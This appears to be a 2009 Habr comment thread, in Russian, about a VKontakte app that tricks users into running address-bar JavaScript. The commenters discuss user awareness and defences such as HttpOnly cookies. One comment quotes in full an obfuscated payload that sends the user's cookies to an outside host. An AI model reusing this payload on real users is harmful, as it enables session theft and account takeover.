antyblin Aug 8 2009 at 07:41

Даже при закрытых дырах на «Вконтакте» можно устроить XSS

1 min

2.9K

Information Security*

+134

133

Comments 133

Brodyaga Aug 8 2009 at 09:01

Я недели две назад отправил жалобу на это приложение. Это не XSS, это дерьмо какое-то. Расчет идет на совершенно безмозглых девочек и мальчиков, коих в контакте слишком много, увы.

UFO landed and left these words here

mdk Aug 8 2009 at 10:52

Если бы…
1. Администрация не будет их блокировать, потому что эти безмозглые девочки\мальчики заносят бабло через покупку голосов.

2. Дело тут даже не в компьютерной грамотности имхо. Пока люди, получив сообщение вида «Сделай <здесь подставить действие> и разошли это сообщение своим друзьям», будут выполнять то, что написано в сообщении — всегда будет способ что-нибудь взломать.

zvirus Aug 9 2009 at 07:42

1) Блокировать их все-таки будут, ибо безопасность для ВКонтакте принципиальна, Пашечка Дуров только о ней и пишет.

2) так будут делать только те, у кого ума с грецкий орех.

a_l Aug 10 2009 at 02:04

1) Сменят пароль без ведома пользователя, подобное уже было недавно.
P.S. Вы на своих сайтах (если есть) взломанных пользователей блокируете?

zvirus Aug 9 2009 at 07:44

Голоса для них не принципиальны, создаются всякие группы с линками на партнерки, типа аудионаркотиков — их закрывают моментально, хоть в эти группы и вкладываются тысячи рублей на рекламу.

sylvio Aug 8 2009 at 15:07

вы пойдете в аптеку, провизор не исправит опечатку в рецепте, потом вы умрете из-за неправильного лечения. вывод: почерк медиков — санитар жизни, позволяет избавиться от юзеров, слишком далеких от медицины.

Kreker Aug 8 2009 at 15:09

Да у нас вся страна по этому принципу живет кстати.

ruzzz Aug 9 2009 at 19:26

Зато так жила и Спарта :)

cyberangel Aug 9 2009 at 12:54

врачи частенько пытаются выписать новые эксперементальные лекарства =), им за это денег много дают

cybergrind Aug 11 2009 at 18:00

то-то, я смотрю, у нас так богато живут врачи

Alexey1 Aug 8 2009 at 16:48

если я не ошибаюсь, при рассылке спама автоматически меняется пароль и высылается на регистрационный емейл, на моей памяти небыло ни 1 блокировки спамеров

ozonar Aug 8 2009 at 20:52

И что, не разу не видели юзера «DELETED»?

Scorpil Aug 9 2009 at 03:55

Я себя так назвал, когда удалился из контакта. Всегда думал что юзеры сами так делают, без помощи админов. :)

Skif300000 Aug 8 2009 at 17:59

Не надо сюда хакеров всешивать…
Хакеры ни когда не будут заниматься такой ерундой, это дело рук студентов 3-4 курса, какого нибудь факультета информационных техногогий или программеров.

A0n3 Aug 8 2009 at 21:50

Да даже младше, выпускники школ скорей всего, 10-11 класс.

VPK Aug 9 2009 at 12:17

администрации от таких юзеров идет основной доход

antyblin Aug 8 2009 at 15:11

Ну, чисто теоретически — XSS:
межсайтовый? да
скриптинг? да
Определению соответствует ;-)

Novikov Aug 8 2009 at 15:15

Вы путаете «безмозглость» и тот факт, что большинство людей, которые, быть может, намного умнее Вас, знать не знают про всякие там куки-хуюки и прочие непонятные им термины.

Они, может, собирают себе адронные коллайдеры или занимаются биохимией. Только юный малолетний мудак-школьнег-пионер может позволить себе назвать их «безмозглыми».

kai Aug 8 2009 at 15:24

Надо юзерам вбивать в голову, что если нет кнопочек «Ок» «Cancel», а есть куча непонятных слов и закорючек — лучше не нажимать, во избежание.

bendep Aug 8 2009 at 16:26

Ну тогда не надо пользоваться поисковиками и другими сервисами по твоей теории… так как там есть: «Куча непонятных закорючек». Причем полюбому…

Kostyanych Aug 8 2009 at 18:07

Ага, у меня тоже иногда в результаты поиска китайские сайты попадают. :)

antyblin Aug 8 2009 at 18:48

Вот ещё не хватало, чтобы пользователь совсем разучился читать, а только нажимал на «Ок» и «Cancel»

kai Aug 8 2009 at 23:07

А зачем пользователю читать и понимать это:

javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,
109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47,
115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
eval(page);
alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"));

??? Когда он тут тупо должен начинать бояться и звать более знающего товарища, т.е. админа.

antyblin Aug 8 2009 at 23:34

>Вот ещё не хватало, чтобы пользователь совсем разучился читать.
Пользователь не должен это понимать. Я к тому клоню, что не всё разрешённое сопровождается кнопками «Ок» и «Cancel», а запрещённое — «страшным» текстом.

zvirus Aug 9 2009 at 07:50

Вопрос в том, как рядовой пользователь ВКонтакте будет искать этого админа…

kai Aug 9 2009 at 17:36

Да никак. Видишь предложение совершить неведомую фуйню, вместо нажимания привычных кнопочек — испугайся, не совершай. Вот так и должно быть.

medvoodoo Aug 9 2009 at 21:59

хех, просветите, я не в курсе: они что куки к ip до сих пор не привязали? плюс есть же еще хеши всякие хитрые, от параметров браузера :) так что увод не помогает

antyblin Aug 9 2009 at 22:08

habrahabr.ru/blogs/infosecurity/66549/#comment_1873432

Novikov Aug 8 2009 at 20:56

Надо разработчикам в голову вбивать, что не юзеры должны учить каждый год новые и новые их косяки, а создатели железа и софта должны заниматься своим делом ответственно.

Не человек для техники, а техника для человека.

Brodyaga Aug 8 2009 at 16:28

«юный малолетний мудак-школьнег-пионер» — следите за речью.

Мои знакомые, далекие от IT жизни, но которые провели вконтакте год или два обладают уже достаточным опытом, чтобы совместив его с природным умом и сообразительностью, не выполнять подобные указания в приложениях, в то время как подавляющее большинство приложений не требует от них это. Люди, которые сидят в социальных сетях, которым приходят разнообразные инвайты и которые активируют функцию «Приложения» вконтакте, обладают, как я считаю, некоторой интернет-грамотностью.

А знаете ли вы, что правила элементарной безопасности стоит вдалбливать в голову каждому человеку, который выходит на просторы интернета? Не согласны?

Brodyaga Aug 8 2009 at 19:40

Я так понимаю, минусующие — это люди, которые допустят маститого и известного биохимика/физика-ядерщика к работе за сложным и опасным для жизни станком без инструктажа? Пусть наматывается на вал, сам мол виноват?

Вступайте в дискуссию, а не прячьтесь за крестиками.

Novikov Aug 8 2009 at 20:55

Запомните главный принцип: не человек для техники, а техника для человека.

ПО для повседневного использования и сайты не должны быть такими, чтобы их мог хакнуть каждый сопляк. Если они такие — то мудаки не юзеры, а разработчики.

Brodyaga Aug 8 2009 at 21:28

Я этот принцип знаю. Но пока мы не в силах объяснить технике во всех мелочах, как она обязана обращаться с пользователем. И это надо учитывать. Представить сложно, сколько людей нажимают «Да» когда выскакивает сообщение типа «Вы действительно хотите безвозвратно удалить все фотографии, видеофайлы и документы накопленные за долгие годы непосильного труда?» а потом бегут в сервис-центры со словами «а какого х. эта х. все нах. удалила?»

Не будет техника думать за человека, она была, есть и всегда будет служить для облегчения работы человека, думать он должен сам, а винить в этом набор двоичных кодов и микросхем — бесполезно и наивно.

Естественно тут есть свои тонкости, и оставлять такие методы кражи тех же куков — это идиотизм, но вопрос сейчас стоит гораздо шире.

DemRo Aug 8 2009 at 20:58

Не припомню, чтоб при покупке компьютера заставляли слушать инструктаж, заполнять журнал по технике безопасности, да и инструкцию к нему никто не даёт (более того, качество книг «компьютер для чайников» — довольно посредственное).
А если бы такое было, то доведено до абсурда, особенно в нашей стране.
Например платный экзамен, выдача прав, коррупция.
И инета у нас не было, а если бы был, то по модему по ценам ещё более диким, чем были лет 10 назад.

Зато люди бы за варкрафтом не помирали, спортом бы занимались (а вот в это я не верю — бухали бы), ботнетов бы не было (на компьютерах только этой страны, да и то вряд ли).

Кстати, я замечал, что порой людям пофигу на вирусы, что кучкуются на их компьютере, по крайней мере, пока можно играться, смотреть фильмы.

Вы всё-таки передёргиваете, сравниваете сидение за «чудо-ящиком» и работой за токарным станком, кислотами, работой с источниками ультрафиолета, с электропроводкой и т.п.

К тому же, даже юниксоиды, которые «по определению» как бы должны быть более подкованы, порой запускают что-нибудь в стиле того однострочника на перле, который удаляет все файлы :).

ТБ при работе с компьютером подписывают разве что на работе, да и то не всегда. Не припомню, что бы за всё время ни одного случая, который бы видел воочию.
Ни на учёбе, ни на работе, ни в компьютерных клубах.

antyblin Aug 8 2009 at 21:12

Нас на уроках информатики в школе каждый год заставляли подписывать)

DemRo Aug 8 2009 at 22:07

Преподаватели тоже понимают, что если что-то случится, им не поздоровится, вот и перестраховываются.
Большинство, правда, ограничивалось только подписью, а инструктаж не проводили (не комп. предметы: физика, физ-ра и др.).

На информатике и подобных предметах, конечно, рассказывали между делом о вирусах… по большей степени, словно для исторической справки.

Преподаватель по компьютерным сетям даже не поверил, что данные может перехватить злоумышленник, сказав, что это никому не нужно.

Такие дела.

antyblin Aug 8 2009 at 22:18

Нам ничего не рассказывали, потому что мы «и так всё знаем». В основном, там было про удары током и прочее. О вирусах даже в мыслях не было рассказывать. К тому же, преподаватель выполнял предписания свыше.

Novikov Aug 8 2009 at 20:52

Я согласен с тем, что крутые кампьютерщеги должны делать свои приложения такими, чтобы их нельзя было хакнуть мизинцем левой ноги в промежутке между сморканием и чисткой зубов.

Вот с этим я согласен.

kai Aug 8 2009 at 23:29

Сложность технологий оставляет кучу лазеек в этих технологиях для плохих людей. Так то в принципе можно было дос вылизать до брульянтового совершенства. Только кому он сейчас нужен?

Brodyaga Aug 8 2009 at 16:31

И да, я сказал про «девочек и мальчиков». Не надо приписывать мне оскорбление кандидатов наук или каких-либо узкопрофильных ученых. Шанс, что на это приложение нарвутся социально активные девочки и мальчики — гораздо выше.

Novikov Aug 8 2009 at 21:00

Вам никто и не приписывал ;-) Но то, что это воспринято на свой счет — само по себе о многом говорит.

UFO landed and left these words here

NULL_byte Aug 9 2009 at 03:32

Плюсaдин. Я бы назвал их компьютерно-неграмотными. С этим нужно бороться, потратить некоторое время своей жизни и обучиться, а лучше, чтобы это вообще преподавали в школе на уроках информатики (у меня например, информатика была только в 8-9-10 классах и то, 80% класса просто списывали/копировали или зубрили, в общем толку — ноль) ). Но вспоминая школьное образование в нашей стране, все мои мысли о компьютерно-образованом поколении развеиваются.

NULL_byte Aug 9 2009 at 03:35

А если в общем, то это дань немыслимым скоростям развития всей этой луйни. И бять туй сним, зато пездато =/

NULL_byte Aug 9 2009 at 03:35

Я больше не буду читать хабр по накурке >_<

MKrivosheev Aug 8 2009 at 15:24

Я тоже жаловался. Интересно, эти жалобы вообще читают? :(

UFO landed and left these words here

user3000 Aug 8 2009 at 20:30

Да уж, похоже что пора администрации Вконтакте добавить подпись под каждым приложением «пользователь устанавливает данное приложение на свой страх и риск».

non7top Aug 8 2009 at 20:40

>Расчет идет на совершенно безмозглых девочек и мальчиков, коих в контакте слишком много, увы.

да совершенно необязательно. мне приведенный код совершенно не показался бы подозрительным, хотя я в IT уже 6 лет. может потому что я не сильно знаком с (веб) программированием и различными способами хищения пользовательских данных.

с другой стороны я помню мегаизвестную штуку
cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{

Napolsky Aug 8 2009 at 09:01

Да, повтор. Именно про этот способ я рассказывал в этом комментарии.

antyblin Aug 8 2009 at 14:28

Простите. Посты я просмотрел, а вот в комменты заглянуть не догадался.

antyblin Aug 8 2009 at 15:00

Хотя, не совсем повтор. Тут проблема в том, что контент приложений никак не проверяется. Проверяется только их взаимодействие со сторонними сайтами.

Napolsky Aug 8 2009 at 15:23

я имел ввиду про способ введения js кода в адресную строку браузера

Korneev Aug 8 2009 at 10:56

А где ссылка на приложение?
Можно в личку.

NULL_byte Aug 8 2009 at 11:03

NULL_byte Aug 8 2009 at 11:06

Парсер лох ^.^

Akr0ZiS Aug 8 2009 at 11:43

о_О Ну и понаштамповали их, однако… Интересно, куда админы смотрят — хоть половину из этих приложений заблокировали бы.

NULL_byte Aug 8 2009 at 11:59

Больше половины заблокировано.

Akr0ZiS Aug 8 2009 at 12:15

Не поленился и прощёлкал чисто из спортивного интереса все 211… Да, действительно больше половины уже заблокировано, просто когда я сначала около десятка наугад тыкнул — все рабочие попались))

de_n Aug 8 2009 at 16:25

Купите лотерею! Непременно выиграете.

VladX Aug 8 2009 at 17:15

Дык ведь рабочие — это плохо как раз)

deerua Aug 8 2009 at 23:42

смени пароль на всякий ;)))
а то станешь стройным участником вк_ботсети ;)

Dimster Aug 9 2009 at 00:56

И руки еще не забыть помыть.

antyblin Aug 9 2009 at 01:00

Кипятком их на всякий случай!)

Akr0ZiS Aug 9 2009 at 13:06

Учитывая, что скрипт я не выполнял и даже приложение не устанавливал, ничего не будет. Но пасс всё-таки сменил, ибо и без того как раз собирался))

kabachok Aug 8 2009 at 13:21

А сколько приложение должно собрть жалоб чтобы на них отреагировали?

danilissimus Aug 8 2009 at 12:22

Это писец! рассчитано на тупых.

UFO landed and left these words here

chegor Aug 9 2009 at 12:52

методы социальной инженериии рассчитаны на усреднённого пользователя, что абсолютно не говорит о его тупости. это всего лишь уровень прокачки человека в конкретной области знания

MiXei4 Aug 8 2009 at 13:33

Нельзя так относиться к людям!
Люди, которые не знают что такое XSS и тп — «безмозглые девочки и мальчики». :/
Социальная сеть — это не Хабр. Среди этих «безмозглых девочек и мальчиков» есть и взрослые люди, которым уже не надо абсолютно знать что такое XSS и как их избегать, есть люди, которые узнали что такое интернет 2 дня назад…

хакеры — санитары соц. сетей, позволяют избавиться от юзеров, слишком далёких от пользования компьютером :)

У меня родители по сути далеко не на ты с компьютером, но я им показал, что такое соц сеть. Они нашли своих одноклассников, друзей детства и радуются этому, поддерживают оотношения. Им больше не надо ничего, они не хотят проходить курсы программистов, для того чтобы пообщаться с друзьями. А «санитары» эти — моральные уроды, вот и всё.

ihs Aug 8 2009 at 15:16

Вряд ли Ваших родителей интересуют флеш-игры типа «весёлого фермера» да «продай своих друзей», поэтому мне кажется проще либо объяснить, что приложения вконтакте это зло и никаких манипуляций проводить с ними не надо, либо просто отключить этот сервис у их аккаунтов.

Gadzhi Aug 8 2009 at 19:23

Родители такие же люди, как и мы с вами, им тоже иногда нравится поиграть в игры. Моя мама, к примеру, любит поиграть в Buuble shooter в контакте. Просто не надо считать, что если кто-то хуже вас разбирается в компьютерах и интернете, то он тупой, это не так!

antyblin Aug 8 2009 at 15:26

Я маме сразу объяснил, что ничего из того, что предлагают выполнить пользователю (вроде перехода по ссылке в сообщении), делать нельзя, предварительно не уведомив меня. Ну и объяснил, почему.
И ничего, тьфу-тьфу, не случилось ещё.

AMCDM Aug 9 2009 at 17:55

А я для поползновений моих предков в интернетах специально поставил убунту. Себе гемора меньше.

beeruser Aug 8 2009 at 15:57

>> Люди, которые не знают что такое XSS и тп — «безмозглые девочки и мальчики»
Ааа! Я, видимо, безмозглый мальчик. Убью себя об стену! =)

romx Aug 8 2009 at 18:56

Ты на Хабре, друг. Ты чего здесь ожидал увидеть?

Sho Aug 8 2009 at 13:36

А кто-то может сказать, все-ли хорошо с этой строкой:

javascript:var%20s=document.createElement('script');s.src='http://videosaver.ru/vs.js?nc='+Math.random();document.body.appendChild(s);void(0);

© Videsaver.ru

Я в этом ничего не смыслю, потому буду рад ответу.

elfiki Aug 8 2009 at 13:58

Все в порядке.

Stalker_RED Aug 8 2009 at 14:14

до тех пор, пока кто-нить не «подправит» videosaver.ru/vs.js :)

Mithgol Aug 8 2009 at 15:03

Как же всё в порядке, если они на страницу свой скрипт добавляют.

Разве не в состоянии он сделать всё, что угодно?

noxon Aug 8 2009 at 17:43

Браузер не позволит ничего плохого сделать, если скрипт загружен с чужого сервера

NULL_byte Aug 9 2009 at 01:22

Зря надеятись. Предыдущая XSS ВК именно так и делала, загружала скрипт с сервера и уже по его инструкции слала куки.

hlomzik Aug 9 2009 at 15:28

Браузеру всё равно, с какого сервера скрипт. Ограничения есть в XHR.

ibnteo Aug 8 2009 at 14:19

Браузерам нужно ограничить использование JS, вводимый через адресную строку в браузере. Для начала нужно просто заблокировать document.cookie.

timur16 Aug 8 2009 at 15:14

Нужно вообще отказаться от псевдопротокола «javascript:»!

ibnteo Aug 8 2009 at 15:33

Тогда перестанут работать многие полезные сервисы, которые удобно использовать в качестве закладок.

UFO landed and left these words here

impass Aug 8 2009 at 19:09

нужно отказаться от его использования при попытке выполнять какой угодно код вручную из строки адреса

hTLK Aug 8 2009 at 15:31

Для меня это самый быстрый способ посмотреть, какие у меня лежат куки от какого-либо сайта.

ibnteo Aug 8 2009 at 15:32

Можно в настройках оставить возможность отключить защиту.

friday Aug 8 2009 at 15:33

Куки в жабаскрипте могут быть весьма полезны, например, для того, чтобы запоминать положение каких-нибудь сворачиваемых/перетаскиваемых элементов (btw, мысль, надо к стикерити прикрутить).
Для сессий и прочих приватных данных есть флаг httponly.

ibnteo Aug 8 2009 at 15:34

Я имею ввиду не в Javascript убрать возможность работать с куками, а лишь в том коде, который вводится через адресную строку.

friday Aug 8 2009 at 15:38

<lor-mode>Код в адресной строке не нужен</lor-mode>

ibnteo Aug 8 2009 at 15:40

см. ответ выше: «Тогда перестанут работать многие полезные сервисы, которые удобно использовать в качестве закладок. „

DIDJER Aug 8 2009 at 15:12

Социальная инженерия самый верный и лучший метод взлома крупных объектов.
Как сказал Энштейн — «в мире две вещи бесконечны — это дураки и вселенная, хотя насчёт второго я не уверен»

smeea Aug 8 2009 at 15:14

>Как сказал Энштейн — «в мире две вещи бесконечны — это дураки и вселенная, хотя насчёт второго я не уверен»
>Энштейн
Я тоже на счет второго не уверен.

DIDJER Aug 8 2009 at 16:23

То же мне :)

DIDJER Aug 8 2009 at 16:29

Однажды на лекции Эйнштейна спросили, как делаются великие открытия. Он ненадолго задумался и ответил:

«Допустим, что все образованные люди знают, что что-то невозможно сделать. Однако находится один невежда, который этого не знает. Он-то и делает открытие!».

UFO landed and left these words here

antyblin Aug 8 2009 at 15:22

Правильно.

GMM Aug 8 2009 at 15:28

Но на хабре отправиться ваша текущая сессия, а вконтактах ваш логин и пароль, которым можно пользоваться когда-угодно.

UFO landed and left these words here

hTLK Aug 8 2009 at 15:39

Тут не всё так просто. Фактически с некоторого момента куки становятся просто строкой с данными. Они подвержены манипуляциям вроде «заменить каждую букву на обратную — »а" на «я», и тогда по левому адрему уйдут не куки, а непонятно что. А запретить вообще работу с куками из JS тоже ой как нехорошо. Вообще это кривизна вконтакта, что украв куки можно получить возможность логиниться под этим юзером. Это известные приколы с безопасностью насчет того что можно хранить в куках, а что нельзя.

voidus Aug 8 2009 at 15:41

Для этого придумали HttpOnly куки, к которым нет доступа из JS.

UFO landed and left these words here

antyblin Aug 8 2009 at 15:56

Заговор?)

voidus Aug 8 2009 at 16:01

К таким причинам может относиться только желание самостоятельно же работать с куками пароля через JS. Например, автоматически авторизовывать пользователя на каких-либо сторонних аффилированных с вконтакте сервисах.
Других причин я не вижу… Хотя с HttpOnly куками всё не так просто, не все браузеры их поддерживают (хотя основные и поддерживают)

UFO landed and left these words here

Ewg Aug 8 2009 at 15:19

Люди, завязывайте с Вконтакте.

dshster Aug 8 2009 at 16:13

Зачем? Газовая плита на кухне тоже потенциально опасна — там же открытое пламя! Мне нравится контакт, он меня всем устраивает, единственное, что нужно следовать некоторым правилам:
• не открывать непонятные ссылки
• не скачивать и тем более не запускать приложения в которых не уверен
• в третьих чем в приложении или на страничке просьб перейти по ссылке: «нажми сюд», «перейти сюда», «обязательно перейди по ссылке» и восклицательных знаков в количестве больше одной штуки, тем больше вероятности, что потом будет плохо.
• ну и на последок официально разрешенные ресурсы не будут требовать таких мудрёных действий для своего запуска — это тоже должно насторожить.

antyblin Aug 8 2009 at 16:40

Ко второму пункту можно ещё добавить, что не следует быть слишком уверенным в себе и в том, что тебя окружают только доброжелатели.

Timon Aug 8 2009 at 16:40

Как вы достали.

serafims Aug 8 2009 at 15:48

Думаю, им надо ввести систему сброса всех этих куков — скажем, каждые два дня. Или для параноиков — маскимально ограничить время жизни сессии. Добавить ip-фильтрацию и тп. Чтоб в куках хранился еще и допустимый ip.
Хороша идея добавления функции блокировки отправления javascript из адресной строки. А обфусцированный код расшифровывать.

antyblin Aug 8 2009 at 15:50

Вот у меня ip динамический — и что мне делать тогда?

serafims Aug 8 2009 at 16:32

Он же не меняется каждые 10 минут.
Идея в создании настраиваемой под каждый случай системы безопасности.
Для кого-то включена проверка адреса, для кого-то — стиль набора пароля, для кого-то — ограничение времени сессии, для кого-то — что-то иное.

alcr Nov 17 2009 at 09:41

А если я хожу через прокси с динамическим распределением трафика по нескольким линкам? У меня каждое отдельное соединение может оказаться на отдельном ипшнике тогда…

medvoodoo Aug 10 2009 at 07:51

В нормальных условиях делается не привязка пользователя к ip, а привязка сессии к ip. В чем разница: если у вас изменился ip то вам надо просто еще раз ввести свой пароль. При некоторых условиях и это умеют обходить :) Мое мнение — лучше лишний раз заставить пользователя вбить пароль, чем потом слить инфу о нем на сторону непреднамеренно.

antonhb Aug 8 2009 at 16:04

Очень захватывающая игра)

UFO landed and left these words here

firstbyte Aug 8 2009 at 16:48

Данный пример наглядно показывает, что как ни борись с уязвимостями на стороне сервера, от «дырок» в головах конечных пользователей не убережёшься.
Будут писать в саппорт «Меня взломали и слили все мои голоса, почему вы не боретесь с хакерами, я на вас в суд подам!!!11»

antyblin Aug 8 2009 at 16:58

Это я и пытался донести)

flashvoid Aug 8 2009 at 18:56

Уязвимости подвержены пользователи версии «ламер». Для устранения уязвимости установите заплатку «напуганный ламер» или дождитесь официального обновления пользователя до версии «продвинутый пользователь».

seriyPS Aug 8 2009 at 20:51

Спасибо, запустил мусорилку...
Надеюсь 20 потоков рандомно сгенерированных кукисов пригодятся кулхацкерам))

antyblin Aug 8 2009 at 20:57

я их вместо отправки кукисов просто послал, но хотелось, конечно, чего-то большего. Например, замусорить.
Спасибо :-)

seriyPS Aug 9 2009 at 11:52

Почему-то после первого миллиона запросов тот скрипт начал выдавать «1» на любые входящие данные… До этого только на уникальные, а на повторы и пустые — «0»
Наверное БД отключили(

antyblin Aug 9 2009 at 13:35

Тоже хабр читают?)

Dimchansky Aug 8 2009 at 22:52

Вот куда надо направлять хабра-эффекты :)

egorinsk Aug 9 2009 at 02:48

Кстати, у всех этих приложений, и рпочей мути, рассчитанной на доверчивых юзеров, есть особенность, они часто используют предложения отправить СМС на опр. номер. По идее, можно же отслеживать негодяев, они ведь регистрируются на аггрегаторе, минимум получаем IP а может и номер в вебманях или куда они там деньги выводят, другой вопрос что видимо это никому не интересно?

Как минимум. если им неохота бороться самим, аггрегаторы могли бы раскрывать и публиковать всю информацию введенную при регистрации.

antyblin Aug 9 2009 at 03:26

erfen.ru/antispam/

UFO landed and left these words here